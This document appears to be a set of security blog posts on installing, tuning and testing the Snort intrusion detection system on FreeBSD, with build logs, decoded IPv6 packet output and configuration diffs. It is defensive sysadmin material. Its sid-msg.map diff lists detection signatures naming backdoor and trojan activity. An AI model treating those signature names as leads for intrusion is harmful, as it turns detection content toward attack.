Snort 3.0 Alpha and IPv6

For the past few days I've been playing with alpha code for Snort 3.0, recently announced. One of the most interesting aspects of Snort 3.0 is the fact that operation is controlled by a Lua interpreter. It's a little like logging into a Cisco router and it's going to change the way everyone uses and interacts with Snort.

I tested snort-03.0.0.a1.4 on a FreeBSD box 6.x box with the lua-5.1.1_2 package installed. I compiled it:

$ ./configure --with-lua-includes=/usr/local/include/lua51/ 
 --with-lua-libraries=/usr/local/lib/lua51/
 --prefix=/usr/local/snort-03.0.0.a1.4/
$ make
$ make install

The alpha code does not have a detection engine yet. It's like the original Snort -- it's only a packet decoder. I thought you might like to see what it looks like when Snort 3.0 decodes IPv6 packets. I'm using this IPv6-only FreeBSD scenario.

When you start Snort, it activates but does nothing until you tell it.

cel433:/usr/local/snort-03.0.0.a1.4/bin# ./snort 
[*] DAQ Modules Loaded...
[*] Loading decoder modules
[+] Loaded ethernet
[+] Loaded null
[+] Loaded arp
[+] Loaded ip
[+] Loaded tcp
[+] Loaded udp
[+] Loaded icmp
[+] Loaded icmp6
[+] Loaded gre
[+] Loaded mpls
[+] Loaded 8021q
[+] Loaded ipv6
[+] Loaded ppp
[+] Loaded pppoe
[+] Loaded raw
[*] Decoder initialized...
[*] Flow manager initialized...
[*] Data source subsystem loaded
[*] Engine manager initialized
[*] Loading command interface
[!] Loading sfips command metatable
[!] Loading data source command metatable
[!] Loading engine command metatable
   ,,_     -*> Snort! <*-
  o"  )~   Version 03.0.0.a1.4 (Build 7) [PRE-ALPHA]
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 2006 Sourcefire Inc.

You tell Snort to begin sniffing using these commands.

> dofile("/usr/local/src/snort-03.0.0.a1.4/etc/snort.lua")
snort> fsniff("fxp0")
Creating new data source
Engine "e2" created
Linking engine "e2" to data source "src2"
init_pcap: Initializing network interface fxp0
init_pcap: netmask lookup for device fxp0: fxp0: no IPv4 address assigned
Device type is Ethernet on interface fxp0
Flow manager "a5a891c4-e448-11db-b5e1-00045a7822bf" created with 16384 flow capacity
[*] Data Source Config:
        Name: src2
        Type: pcap
        Interface: fxp0
        Filename:  
        Snaplen: 1514
        Flags: 0x00000002
        Display: ethernet (4)
        Filter command:  
        DAQ: 0x807e400
        User Context: 0x808f3c0
        User Data: 0x0
        Max flows: 16384
        Max idle: 10
        Memcap: 10000000
[*] Flow Manager Config:
        Max flows: 16384
         Max idle: 10
           Memcap: 10000000
[*] DAQ config:
   Interface: fxp0
   Snaplen: 1514
   Datalink: 1
   Count: 0
   Packet Count: 0
   Promisc flag: 1
   File flag: 0
   pcap ptr: 0x80ac400
   analysis context ptr: 0x80a9600
[*] Spawning engine thread!

I generate ICMPv6 traffic that Snort can see.

mwmicro:/home/string$ ping6 -c 1 p200
PING6(56=40+8+8 bytes) fe80::200:d1ff:feed:8c74%sf3 --> fe80::204:5aff:fe79:43a7%sf3
16 bytes from fe80::204:5aff:fe79:43a7%sf3, icmp_seq=0 hlim=64 time=1.131 ms

--- p200 ping6 statistics ---
1 packets transmitted, 1 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 1.131/1.131/1.131/0.000 ms

Here is what Snort reports.

snort> [*] Packet on interface fxp0
[*] Packet Info
    Serial:                 1
    Packet Time:            04/06-14:11:13.098377
    Packet Bytes:           70
    Captured Bytes:         70
    Layers:                 4
[*] Ethernet (14 bytes)
    Source MAC Address:     00:00:D1:ED:8C:74
    Dest MAC Address:       00:04:5A:79:43:A7
    Encapsulated Protocol:  IPv6
[*] Internet Protocol version 6 (40 bytes)
    Version:                6
    Class:                  0 (0x0)
    Flow Tag:               96 (0x60)
    Packet Length:          16
    Next Header:            ipv6-icmp
    Hop Limit:              64
    Src Addr:               fe80::200:d1ff:feed:8c74
    Dst Addr:               fe80::204:5aff:fe79:43a7
[*] Internet Control Message Protocol Version 6
    Type:       128 (Echo Request)
    Code:       0 
    Id:         11124
    Seq:        0
    Checksum:   22822 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 46 16 55 0E 00 0A 64 63                          F.U...dc         

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
    Serial:                 2
    Packet Time:            04/06-14:11:13.098802
    Packet Bytes:           70
    Captured Bytes:         70
    Layers:                 4
[*] Ethernet (14 bytes)
    Source MAC Address:     00:04:5A:79:43:A7
    Dest MAC Address:       00:00:D1:ED:8C:74
    Encapsulated Protocol:  IPv6
[*] Internet Protocol version 6 (40 bytes)
    Version:                6
    Class:                  0 (0x0)
    Flow Tag:               96 (0x60)
    Packet Length:          16
    Next Header:            ipv6-icmp
    Hop Limit:              64
    Src Addr:               fe80::204:5aff:fe79:43a7
    Dst Addr:               fe80::200:d1ff:feed:8c74
[*] Internet Control Message Protocol Version 6
    Type:       129 (Echo Reply)
    Code:       0 
    Id:         11124
    Seq:        0
    Checksum:   22566 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 46 16 55 0E 00 0A 64 63                          F.U...dc         

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
    Serial:                 3
    Packet Time:            04/06-14:11:18.096779
    Packet Bytes:           86
    Captured Bytes:         86
    Layers:                 4
[*] Ethernet (14 bytes)
    Source MAC Address:     00:00:D1:ED:8C:74
    Dest MAC Address:       00:04:5A:79:43:A7
    Encapsulated Protocol:  IPv6
[*] Internet Protocol version 6 (40 bytes)
    Version:                6
    Class:                  0 (0x0)
    Flow Tag:               96 (0x60)
    Packet Length:          32
    Next Header:            ipv6-icmp
    Hop Limit:              255
    Src Addr:               fe80::200:d1ff:feed:8c74
    Dst Addr:               fe80::204:5aff:fe79:43a7
[*] Internet Control Message Protocol Version 6
    Type:       135 (ND Neighbor Solicitation)
    Code:       0 
    Checksum:   32787 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 01 01 00 00 D1 ED 8C 74                          .......t         

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
    Serial:                 4
    Packet Time:            04/06-14:11:18.097203
    Packet Bytes:           78
    Captured Bytes:         78
    Layers:                 4
[*] Ethernet (14 bytes)
    Source MAC Address:     00:04:5A:79:43:A7
    Dest MAC Address:       00:00:D1:ED:8C:74
    Encapsulated Protocol:  IPv6
[*] Internet Protocol version 6 (40 bytes)
    Version:                6
    Class:                  0 (0x0)
    Flow Tag:               96 (0x60)
    Packet Length:          24
    Next Header:            ipv6-icmp
    Hop Limit:              255
    Src Addr:               fe80::204:5aff:fe79:43a7
    Dst Addr:               fe80::200:d1ff:feed:8c74
[*] Internet Control Message Protocol Version 6
    Type:       136 (ND Neighbor Advertisement)
    Code:       0 
    Checksum:   40574 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 02 04 5A FF FE 79 43 A7                          ..Z..yC.         

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
    Serial:                 5
    Packet Time:            04/06-14:11:18.097456
    Packet Bytes:           86
    Captured Bytes:         86
    Layers:                 4
[*] Ethernet (14 bytes)
    Source MAC Address:     00:04:5A:79:43:A7
    Dest MAC Address:       00:00:D1:ED:8C:74
    Encapsulated Protocol:  IPv6
[*] Internet Protocol version 6 (40 bytes)
    Version:                6
    Class:                  0 (0x0)
    Flow Tag:               96 (0x60)
    Packet Length:          32
    Next Header:            ipv6-icmp
    Hop Limit:              255
    Src Addr:               fe80::204:5aff:fe79:43a7
    Dst Addr:               fe80::200:d1ff:feed:8c74
[*] Internet Control Message Protocol Version 6
    Type:       135 (ND Neighbor Solicitation)
    Code:       0 
    Checksum:   32787 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 01 01 00 04 5A 79 43 A7                          ....ZyC.         

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[*] Packet on interface fxp0
[*] Packet Info
    Serial:                 6
    Packet Time:            04/06-14:11:18.097744
    Packet Bytes:           78
    Captured Bytes:         78
    Layers:                 4
[*] Ethernet (14 bytes)
    Source MAC Address:     00:00:D1:ED:8C:74
    Dest MAC Address:       00:04:5A:79:43:A7
    Encapsulated Protocol:  IPv6
[*] Internet Protocol version 6 (40 bytes)
    Version:                6
    Class:                  0 (0x0)
    Flow Tag:               96 (0x60)
    Packet Length:          24
    Next Header:            ipv6-icmp
    Hop Limit:              255
    Src Addr:               fe80::200:d1ff:feed:8c74
    Dst Addr:               fe80::204:5aff:fe79:43a7
[*] Internet Control Message Protocol Version 6
    Type:       136 (ND Neighbor Advertisement)
    Code:       0 
    Checksum:   24128 (INVALID 0000)
[*] Payload (8 bytes)
0x0000: 02 00 D1 FF FE ED 8C 74                          .......t         

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Finally I tell Snort to shut down.

sfips.shutdown()
[*] SFIPS ACTIVE data source src2 received 6 packets on fxp0
     Analyzed: 6 (100.000%)
      Dropped: 0 (0.000%)
[-] Ethernet Stats:
        Count: 6
[-] IPv6 Stats:
        Count: 6
[-] ICMPv6 Stats:
        Count: 6
     Bad Csum: 6
[-] Raw Stats:
        Count: 6
        Bytes: 48

This is obviously only the beginning. I plan to learn more about Lua to take advantage of the power in Snort 3.0.

Read More

Pointer to Snort 3.0 Briefing Summary

Saad Kadhi kindly pointed me to this blog post which summarizes a talk given by Marty Roesch. Saad describes Marty's plans for Snort 3.0, and I recommend taking a look.

Read More

Bejtlich Cited in Sourcefire IPO Story

Bill Brenner published this quote in his story Sourcefire IPO could fuel Snort, users say:

The infrastructure to support Snort isn't cheap and Sourcefire isn't flush with cash, said Richard Bejtlich, founder of the Washington, D.C.-based consultancy Tao Security. "The money to keep Snort thriving has to come from somewhere, and an IPO could give Snort more legs," he said.

I based this thought on the following from Sourcefire's S-1, listed under Risks Related to Our Business:

We have incurred operating losses each year since our inception in 2001. Our net loss was approximately $10.5 million for the year ended December 31, 2004, $5.5 million for the year ended December 31, 2005 and $2.9 million for the nine months ended September 30, 2006. Our accumulated deficit as of September 30, 2006 is approximately $40.3 million.

It looks like Sourcefire's losses are narrowing, which points to future profitability. My point is that development of Snort and associated software (RNA, etc.) takes significant resources. While it might not be that difficult to fork Snort and maintain its code base, adding significant features and developing complex rules would be extremely tough for a noncommercial enterprise to sustain.

Read More

Snort 2.6.0 FreeBSD Port Problem

You may have read that Snort 2.6.0 is in the FreeBSD ports tree now. I installed the package this morning and learned there is a problem with the specification for the dynamic components. Specifically, from snort.conf:

dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/
...
dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so

FreeBSD does not use this structure. Change those entries to:

dynamicpreprocessor directory /usr/local/lib/snort/dynamicpreprocessor/
...
dynamicengine /usr/local/lib/snort/dynamicengine/libsf_engine.so

You can also pass the necessary locations via the command line.

I've submitted a FreeBSD PR.

Read More

Snort 2.6.0 High Memory Usage on FreeBSD

I've been working with Snort 2.6.0 on FreeBSD.

When you look at the snort.conf you'll see a bunch of rules commented out.

# include $RULE_PATH/web-attacks.rules
# include $RULE_PATH/backdoor.rules
# include $RULE_PATH/shellcode.rules
# include $RULE_PATH/policy.rules
# include $RULE_PATH/porn.rules
# include $RULE_PATH/info.rules
# include $RULE_PATH/icmp-info.rules
# include $RULE_PATH/virus.rules
# include $RULE_PATH/chat.rules
# include $RULE_PATH/multimedia.rules
# include $RULE_PATH/p2p.rules
# include $RULE_PATH/spyware-put.rules

When you start Snort you'll see it uses much more memory compared to earlier versions.

  654 root        1 -58    0   248M   247M bpf    0   0:01  3.30% snort

If this is too much, and you are willing to sacrifice Snort performance, you can enable the following in snort.conf:

config detection: search-method lowmem

This results in less memory usage.

  656 root        1 -58    0 39800K 39128K bpf    0   0:01  0.00% snort

With this option enabled you can even uncomment all rules.

  661 root        1 -58    0 59224K 58580K bpf    0   0:01  1.95% snort

What if you want the best performance and all rules? Well, on FreeBSD you are going to encounter a 512 MB default RAM limitation that will prevent Snort from running.

 
# limit
cputime      unlimited
filesize     unlimited
datasize     524288 kbytes
stacksize    65536 kbytes
coredumpsize unlimited
memoryuse    unlimited
vmemoryuse   unlimited
descriptors  11095 
memorylocked unlimited
maxproc      5547 
sbsize       unlimited

You can change this by making the following entries in /boot/loader.conf:

kern.dfldsiz="1G"                # Set the initial data size limit
kern.maxdsiz="1G"                # Set the max data size

Reboot when done. Here is the result.

# limit
cputime      unlimited
filesize     unlimited
datasize     1048576 kbytes
stacksize    65536 kbytes
coredumpsize unlimited
memoryuse    unlimited
vmemoryuse   unlimited
descriptors  11095 
memorylocked unlimited
maxproc      5547 
sbsize       unlimited

Now you can run Snort with all rules and best performance, and see it occupies over 900 MB.

  645 root        1 -58    0   925M   926M bpf    0   0:04  0.00% snort

I have not tested Snort to see the effect of various options, although I prefer to run as many rule sets as makes sense for my environment. Note I did not add Bleeding or Community rule sets for this example.

Read More

FreeBSD Snort 2.6.0 Port Available

The FreeBSD security/snort port now offers 2.6.0. Just run portsnap fetch && portsnap update and you're ready. I'm not sure if/when Snort 2.6.0.1 will be added to the ports tree. I haven't tried 2.6.1 Beta, yet.

Read More

Snort 2.6.0 on FreeBSD

I've talked about Snort 2.6 twice before. I wanted to give 2.6 a try using the FreeBSD ports tree, but the security/snort port still offers only 2.4.5.

I looked for a problem report and found this one. It provided patches against the 2.4.5 port for 2.6.0. I decided to duplicate the /usr/ports/security/snort directory as /usr/ports/security/snort-2.6, and create Makefile.patch, distinfo.patch, and pkg-plist.patch files using the information in the PR.

Next I patched each of the 2.4.5 files.

orr:/usr/ports/security/snort-2.6# patch -p0 < Makefile.patch 
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- /usr/ports/security/snort/Makefile Sat Jun 10 13:26:30 2006
|+++ ./snort/Makefile   Thu Jul  6 17:34:13 2006
--------------------------
Patching file /usr/ports/security/snort/Makefile using Plan A...
Hunk #1 succeeded at 6.
Hunk #2 succeeded at 15.
Hunk #3 succeeded at 38.
Hunk #4 succeeded at 46.
Hunk #5 succeeded at 110.
done

orr:/usr/ports/security/snort-2.6# patch -p0 distinfo < distinfo.patch 
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- /usr/ports/security/snort/distinfo Sat Jun 10 13:26:30 2006
|+++ ./snort/distinfo   Mon Jun 12 17:03:32 2006
--------------------------
Patching file distinfo using Plan A...
Hunk #1 succeeded at 1.
done

orr:/usr/ports/security/snort# patch -p0 < pkg-plist.patch
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- /usr/ports/security/snort/pkg-plist        Sat Jun 10 13:26:30 2006
|+++ ./snort/pkg-plist  Thu Jul  6 17:33:06 2006
--------------------------
Patching file /usr/ports/security/snort/pkg-plist using Plan A...
Hunk #1 succeeded at 1.
Hunk #2 succeeded at 7.
Hunk #3 succeeded at 23.
done

Now I was ready to run make.

orr:/usr/ports/security/snort-2.6# make
===>  Found saved configuration for snort-2.4.4
=> snort-2.4.5.tar.gz is not in /usr/ports/security/snort-2.6/distinfo.
=> Either /usr/ports/security/snort-2.6/distinfo is out of date, or
=> snort-2.4.5.tar.gz is spelled incorrectly.
*** Error code 1

Stop in /usr/ports/security/snort-2.6.

Shoot, what is that? It looked like I had a saved configuration from the last time I installed Snort. I tried to think how to fix that, then I remembered blogging it last year. I needed to eliminate the old /var/db/ports/snort/options configuration file.

orr:/var/db/pkg# cd /var/db/ports
orr:/var/db/ports# ls -al
total 6
drwxr-xr-x   3 root  wheel  512 Mar  8 19:22 .
drwxr-xr-x  10 root  wheel  512 Aug  4 09:49 ..
drwxr-xr-x   2 root  wheel  512 Mar  8 19:22 snort
orr:/var/db/ports# cd snort
orr:/var/db/ports/snort# ls -al
total 6
drwxr-xr-x  2 root  wheel  512 Mar  8 19:22 .
drwxr-xr-x  3 root  wheel  512 Mar  8 19:22 ..
-rw-r--r--  1 root  wheel  239 Mar  8 19:22 options
orr:/var/db/ports/snort# cat options 
# This file is auto-generated by 'make config'.
# No user-servicable parts inside!
# Options for snort-2.4.4
_OPTIONS_READ=snort-2.4.4
WITHOUT_FLEXRESP=true
WITHOUT_MYSQL=true
WITHOUT_ODBC=true
WITHOUT_POSTGRESQL=true
WITHOUT_PRELUDE=true

I decided to move the old directory to a new name.

orr:/var/db/ports# mv snort/ snort-2.4.x/

With that done, I ran make.

orr:/usr/ports/security/snort-2.6# make

I saw this menu next.



I accepted the defaults and hit ok. Make then continued,

===>  Found saved configuration for snort-2.6.0
=> snort-2.6.0.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
=> Attempting to fetch from http://www.snort.org/dl/current/.
snort-2.6.0.tar.gz                             44% of 3244 kB  230 kBps
...truncated...

Make completed without any problems, so I ran make install. I include all of the output here because the PR noted making some changes regarding file installation locations.

orr:/usr/ports/security/snort-2.6# make install
===>  Installing for snort-2.6.0
===>   snort-2.6.0 depends on shared library: pcre.0 - found
===>   Generating temporary packing list
===>  Checking if security/snort-2.6 already installed
...edited...
Libraries have been installed in:
   /usr/local/lib/snort_dynamicpreprocessor

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
   - add LIBDIR to the `LD_LIBRARY_PATH' environment variable
     during execution
   - add LIBDIR to the `LD_RUN_PATH' environment variable
     during linking
   - use the `-Wl,--rpath -Wl,LIBDIR' linker flag

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------
Making install in dynamic-examples
make  install-recursive
Making install in dynamic-preprocessor
make  install-am
Making install in dynamic-rule
make  install-am
test -z "/usr/local/bin" || /bin/sh ../mkinstalldirs "/usr/local/bin"
  /bin/sh /usr/local/bin/libtool --mode=install install  -s -o root -g wheel -m 555 'snort' 
 '/usr/local/bin/snort'
install -o root -g wheel -m 555 -s snort /usr/local/bin/snort
Making install in doc
Making install in etc
Making install in templates
Making install in contrib
Making install in schemas
Making install in rpm
Making install in m4
test -z "/usr/local/man/man8" || /bin/sh ./mkinstalldirs "/usr/local/man/man8"
 install  -o root -g wheel -m 444 './snort.8' '/usr/local/man/man8/snort.8'
[ -d /usr/local/etc/snort ] || /bin/mkdir -p /usr/local/etc/snort
[ -d /usr/local/share/examples/snort ] || /bin/mkdir -p /usr/local/share/examples/snort
[ -d /usr/local/etc/snort/rules ] || /bin/mkdir -p /usr/local/etc/snort/rules
[ -d /var/log/snort ] || /bin/mkdir -p /var/log/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/classification.config
 /usr/local/etc/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/classification.config 
 /usr/local/share/examples/snort/classification.config-sample
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/gen-msg.map /usr/local/etc/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/gen-msg.map 
 /usr/local/share/examples/snort/gen-msg.map-sample
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/generators 
 /usr/local/etc/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/generators 
 /usr/local/share/examples/snort/generators-sample
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/reference.config
 /usr/local/etc/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/reference.config 
 /usr/local/share/examples/snort/reference.config-sample
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid
 /usr/local/etc/snort
install  -o root -g wheel -m 444
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid 
 /usr/local/share/examples/snort/sid-sample
install  -o root -g wheel -m 444
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid-msg.map
 /usr/local/etc/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/sid-msg.map 
 /usr/local/share/examples/snort/sid-msg.map-sample
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/snort.conf
 /usr/local/etc/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/snort.conf 
 /usr/local/share/examples/snort/snort.conf-sample
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/threshold.conf
 /usr/local/etc/snort
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/threshold.conf 
 /usr/local/share/examples/snort/threshold.conf-sample
install  -o root -g wheel -m 444
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/unicode.map
 /usr/local/etc/snort
install  -o root -g wheel -m 444
 /usr/ports/security/snort-2.6/work/snort-2.6.0/etc/unicode.map 
 /usr/local/share/examples/snort/unicode.map-sample
install  -o root -g wheel -m 444 
 /usr/ports/security/snort-2.6/work/snort-2.6.0/schemas/create*
 /usr/local/share/examples/snort
cd /usr/ports/security/snort-2.6/work/snort-2.6.0 &&
 install  -o root -g wheel -m 444 RELEASE.NOTES doc/AUTHORS doc/BUGS doc/CREDITS 
 doc/README* doc/USAGE doc/*.pdf /usr/local/share/doc/snort
=========================================================================
Snort uses rcNG startup script and must be enabled via /etc/rc.conf
Please see /usr/local/etc/rc.d/snort.sh 
for list of available variables and their description.
Configuration files are located in /usr/local/etc/snort directory.

NOTE: Starting with Snort 2.4.0 (released on 2005-04-22) 
      the rules are no longer included with the distribution.
      Please download them from http://www.snort.org/rules/.
      You might consider installing security/oinkmaster port to simplify
      rules downloads and updates.
=========================================================================
===> Installing rc.d startup script(s)
===>   Compressing manual pages for snort-2.6.0
===>   Registering installation for snort-2.6.0

Let's see what happened to the configuration files.

orr:/usr/ports/security/snort-2.6# cd /usr/local/etc/snort
orr:/usr/local/etc/snort# ls -al
total 646
drwxr-xr-x   3 root  wheel     512 Aug  4 09:59 .
drwxr-xr-x  12 root  wheel    1536 Aug  4 09:59 ..
-r--r--r--   1 root  wheel    3455 Aug  4 09:59 classification.config
-r--r--r--   1 root  wheel    9822 Aug  4 09:59 gen-msg.map
-r--r--r--   1 root  wheel    1906 Aug  4 09:59 generators
-r--r--r--   1 root  wheel     548 Aug  4 09:59 reference.config
drwxr-xr-x   2 root  wheel     512 Aug  4 09:59 rules
-r--r--r--   1 root  wheel       5 Aug  4 09:59 sid
-r--r--r--   1 root  wheel  519377 Aug  4 09:59 sid-msg.map
-r--r--r--   1 root  wheel   34080 Aug  4 09:59 snort.conf
-r--r--r--   1 root  wheel    2319 Aug  4 09:59 threshold.conf
-r--r--r--   1 root  wheel   53841 Aug  4 09:59 unicode.map

Those are all new. With Snort installed, I decided to test it with the -V flag.

orr:/usr/ports/security/snort-2.6# rehash
orr:/usr/ports/security/snort-2.6# snort -V

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.6.0 (Build 59)  FreeBSD
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2006 Sourcefire Inc., et al.

So far so good. Now I needed rules. For Snort 2.4, unregistered users can download snortrules-pr-2.4.tar.gz. Those should work with Snort 2.6 also. However, Sourcefire says the following:

These VRT Certified rulesets were released on 7/27/05 and will be updated at the time of the next major Snort release.

To me, that implies there should be a snortrules-pr-2.6.tar.gz archive available for unregistered users. I spoke to someone from Sourcefire and they said they expect to produce one shortly, once the Snort 2.4.x line is retired.

Because I am a registered Snort user, I downloaded and extracted snortrules-snapshot-CURRENT.tar.gz. This is what I found.

orr:/usr/local/etc/snort# ls rules/
VRT-License.txt         local.rules             smtp.rules
attack-responses.rules  misc.rules              snmp.rules
backdoor.rules          multimedia.rules        snort.conf
bad-traffic.rules       mysql.rules             spyware-put.rules
chat.rules              netbios.rules           sql.rules
classification.config   nntp.rules              telnet.rules
ddos.rules              oracle.rules            tftp.rules
deleted.rules           other-ids.rules         threshold.conf
dns.rules               p2p.rules               unicode.map
dos.rules               policy.rules            virus.rules
experimental.rules      pop2.rules              web-attacks.rules
exploit.rules           pop3.rules              web-cgi.rules
finger.rules            porn.rules              web-client.rules
ftp.rules               reference.config        web-coldfusion.rules
generators              rpc.rules               web-frontpage.rules
icmp-info.rules         rservices.rules         web-iis.rules
icmp.rules              scan.rules              web-misc.rules
imap.rules              shellcode.rules         web-php.rules
info.rules              sid-msg.map             x11.rules

You'll notice several files that are not rules.

orr:/usr/local/etc/snort# ls | grep -v rules
classification.config
doc
gen-msg.map
generators
reference.config
sid
sid-msg.map
snort.conf
threshold.conf
unicode.map

Looking at these, I found zero or no important differences for classification.config, reference.config, threshold.conf, and unicode.map. There is no gen-msg.map file in the rules/ directory.

The rules/sid-msg map is much different.

orr:/usr/local/etc/snort# diff sid-msg.map rules/sid-msg.map | head
2c2
< 104 || BACKDOOR - Dagger_1.4.0_client_connect || arachnids,483 || 
 url,www.tlsecurity.net/backdoor/Dagger.1.4.html
---
> 104 || DELETED BACKDOOR - Dagger_1.4.0_client_connect || arachnids,483 || 
 url,www.tlsecurity.net/backdoor/Dagger.1.4.html
4c4
< 106 || BACKDOOR ACKcmdC trojan scan || arachnids,445
---
> 106 || DELETED BACKDOOR ACKcmdC trojan scan || arachnids,445
6,7c6,7
< 108 || BACKDOOR QAZ Worm Client Login access || MCAFEE,98775

Therefore, use, the sid-msg map file packaged with the rule set, and not the one shipped with Snort.

I also looked for differences in the snort.conf shipped with Snort and the version shipped with the rules.

orr:/usr/local/etc/snort# diff snort.conf rules/snort.conf 
2c2
< #   http://www.snort.org     Snort 2.6.0 config file
---
> #   http://www.snort.org     Snort current Ruleset
5c5
< # $Id$
---
> # $Id: snort.conf,v 1.167 2006/06/09 15:14:08 mwatchinski Exp $
111c111
< var RULE_PATH ./rules
---
> var RULE_PATH ../rules
852c852
<  include $RULE_PATH/virus.rules
---
> # include $RULE_PATH/virus.rules
855a856
> # include $RULE_PATH/spyware-put.rules

The new file has a different RULE_PATH to point to the directory where the snort.conf and rules files reside. The new snort.conf also disables the virus.rules set, and the new spyware-put.rules set.

With these changes in mind, I ran Snort in test mode using the -T switch.

orr:/usr/local/etc/snort# snort -T -c rules/snort.conf
Running in Test mode with config file: rules/snort.conf
Running in IDS mode

        --== Initializing Snort ==--
Initializing Output Plugins!
Initializing Preprocessors!
Initializing Plug-ins!
Parsing Rules file rules/snort.conf

+++++++++++++++++++++++++++++++++++++++++++++++++++
Initializing rule chains...
Var 'EXTERNAL_NET' defined, value len = 3 chars, value = any
Var 'DNS_SERVERS' defined, value len = 3 chars, value = any
Var 'SMTP_SERVERS' defined, value len = 3 chars, value = any
Var 'HTTP_SERVERS' defined, value len = 3 chars, value = any
Var 'SQL_SERVERS' defined, value len = 3 chars, value = any
Var 'TELNET_SERVERS' defined, value len = 3 chars, value = any
Var 'SNMP_SERVERS' defined, value len = 3 chars, value = any
Var 'HTTP_PORTS' defined, value len = 2 chars, value = 80
Var 'SHELLCODE_PORTS' defined, value len = 3 chars, value = !80
Var 'ORACLE_PORTS' defined, value len = 4 chars, value = 1521
Var 'AIM_SERVERS' defined, value len = 185 chars
   [64.12.24.0/23,64.12.28.0/23,64.12.161.0/24,64.12.163.0/24,64.12.200.0/24,
    205.188.3.0/24,205.188.5.0/24,205.188.7.0/24,205.188.9.0/24,
    205.188.153.0/24,205.188.179.0/24,205.188.248.0/24]
Var 'RULE_PATH' defined, value len = 8 chars, value = ../rules
,-----------[Flow Config]----------------------
| Stats Interval:  0
| Hash Method:     2
| Memcap:          10485760
| Rows  :          4099
| Overhead Bytes:  16400(%0.16)
`----------------------------------------------
Frag3 global config:
    Max frags: 65536
    Fragment memory cap: 4194304 bytes
Frag3 engine config:
    Target-based policy: FIRST
    Fragment timeout: 60 seconds
    Fragment min_ttl:   1
    Fragment ttl_limit: 5
    Fragment Problems: 1
    Bound Addresses: 0.0.0.0/0.0.0.0
Stream4 config:
    Stateful inspection: ACTIVE
    Session statistics: INACTIVE
    Session timeout: 30 seconds
    Session memory cap: 8388608 bytes
    Session count max: 8192 sessions
    Session cleanup count: 5
    State alerts: INACTIVE
    Evasion alerts: INACTIVE
    Scan alerts: INACTIVE
    Log Flushed Streams: INACTIVE
    MinTTL: 1
    TTL Limit: 5
    Async Link: 0
    State Protection: 0
    Self preservation threshold: 50
    Self preservation period: 90
    Suspend threshold: 200
    Suspend period: 30
    Enforce TCP State: INACTIVE  
    Midstream Drop Alerts: INACTIVE
    Server Data Inspection Limit: -1
WARNING rules/snort.conf(408) => flush_behavior set in config file, using old static flushpoints (0)
Stream4_reassemble config:
    Server reassembly: INACTIVE
    Client reassembly: ACTIVE
    Reassembler alerts: ACTIVE
    Zero out flushed packets: INACTIVE
    Flush stream on alert: INACTIVE
    flush_data_diff_size: 500
    Reassembler Packet Preferance : Favor Old
    Packet Sequence Overlap Limit: -1
    Flush behavior: Small (<255 bytes)
    Ports: 21 23 25 42 53 80 110 111 135 136 137 139 143 445 513 1433 1521 3306 
